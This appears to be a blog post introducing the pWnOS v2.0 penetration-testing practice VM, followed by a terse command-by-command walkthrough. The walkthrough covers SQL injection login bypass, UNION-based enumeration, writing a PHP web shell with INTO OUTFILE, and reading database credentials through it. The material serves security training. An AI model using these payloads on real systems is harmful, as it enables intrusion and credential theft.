pWnOS v2.0 (PRE-RELEASE!)
Goal:
- Get root... Win!
About:
pWnOS v2.0 is a Virutal Machine Image which hosts a server to pratice penetration testing. It will test your ability to exploit the server and contains multiple entry points to reach the goal (root). It was design to be used with WMWare Workstation 7.0, but can also be used with most other virtual machine software.
Configuration & Setup:
- Configure your attacking platform to be within the 10.10.10.0/24 network range
For example the ip of 10.10.10.200 with the netmask of 255.255.255.0 is what I statically set my BackTrack 5 network adapter to.
- VMWare's Network Adapter is set to Bridged Network Adapter
You may need to change VMWare's Network Adapter to NAT or Host-Only depending on your setup
The server's ip is staticaly set to 10.10.10.100
Server's Network Settings:
- IP: 10.10.10.100
- Netmask: 255.255.255.0
- Gateway: 10.10.10.15
Version History:
v2.0 - 07/04/2011 - Pre-Release copy for initial testing
Source: pWnOS_v2.0.7z/pWnOS v2.0/pWnOS_INFO-v2_0.txt
Vulnerabilities:
- Insecure File Handling
- Password In Plain Text
- Reused Credentials
- SQL Injection
- Unrestricted Upload of File with Dangerous Type
pWnOS_v2.0.7z (Size: 286 MB)
- Download: http://pwnos.com/files/pWnOS_v2.0.7z
Simple TuT :
netdiscover -r 10.10.10.0/25 // Discover Network
ifconfig eth0 10.10.10.13 // Set local ip
nmap -v -A 10.10.10.100
firefox 10.10.10.100/login // Check MainPage
'or 1=1-- - // Check Login for Sqli
'UNION SELECT -1,-1,-1 -- - // Check root dir
Start BurpSuite // BT > Vuln Asses > Web Applic >> burpsuite
Set Firefox Proxy to 127.0.0.1 8080 // Set BurpSuite Proxy
//Decode to Url and Send to Repeater
'UNION SELECT 1,2,3,4,5,6,7,8,9,10-- - // Check columns
'UNION SELECT 1,2,3,4,5,6,7,8,9-- - // Check columns
'UNION SELECT 1,2,3,4,5,6,7,8-- - // welcome 4="String"
'UNION SELECT 1,2,3,user(),5,6,7,8 -- - // Check Running User
'UNION SELECT 1,2,3,database(),5,6,7,8 -- - // Check database() name
'UNION SELECT 1,2,3,version(),5,6,7,8 -- - // Check version()
//END
cd /pentest/web/dirb // Brute http dirs
./dirb http://10.10.10.100 // Brute http dirs
//Decode to Url and Send to Repeater
'UNION SELECT with,great,power,comes,great,responsibility,by,cr4shyyyyy INTO OUTFILE "/var/www/w00t.php"-- - // Build w00t
'UNION SELECT with,great,power,comes,great,responsibility,by,cr4shyyyyy INTO OUTFILE "/var/www/blog/w00t.php"-- - // Build w00t
'UNION SELECT with,great,power,comes,great,responsibility,by,cr4shyyyyy INTO OUTFILE "/var/www/blog/config/w00t.php"-- - // Build w00t
'UNION SELECT 1,2,3,"<? system($_GET['c']);?>",5,6,7,8 INTO OUTFILE "/var/www/blog/config/payload.php"-- - // Build php shell
//'UNION SELECT null,null,null,"<? system($_GET['c']);?>",null,null,null,null INTO OUTFILE "/var/www/blog/config/payload.php"-- - // Build php shell
//END
firefox 10.10.10.100/payload.php?c=ls
firefox 10.10.10.100/payload.php?c=ls /
firefox 10.10.10.100/payload.php?c=ls /var
firefox 10.10.10.100/payload.php?c=ls /var/www
firefox 10.10.10.100/payload.php?c=cat /var/mysqli_connect.php
firefox 10.10.10.100/payload.php?c=cp /var/mysqli_connect.php /var/www/blog/config/mysqli_connect.txt
firefox 10.10.10.100/payload.php?c=cp /var/www/mysqli_connect.php /var/www/blog/config/mysqli_connect2.txt
firefox 10.10.10.100/blog/config/mysqli_connect.txt
firefox 10.10.10.100/blog/config/mysqli_connect2.txt
ssh root@10.10.10.100
With Great Power comes Great Responsibility
No comments:
Post a Comment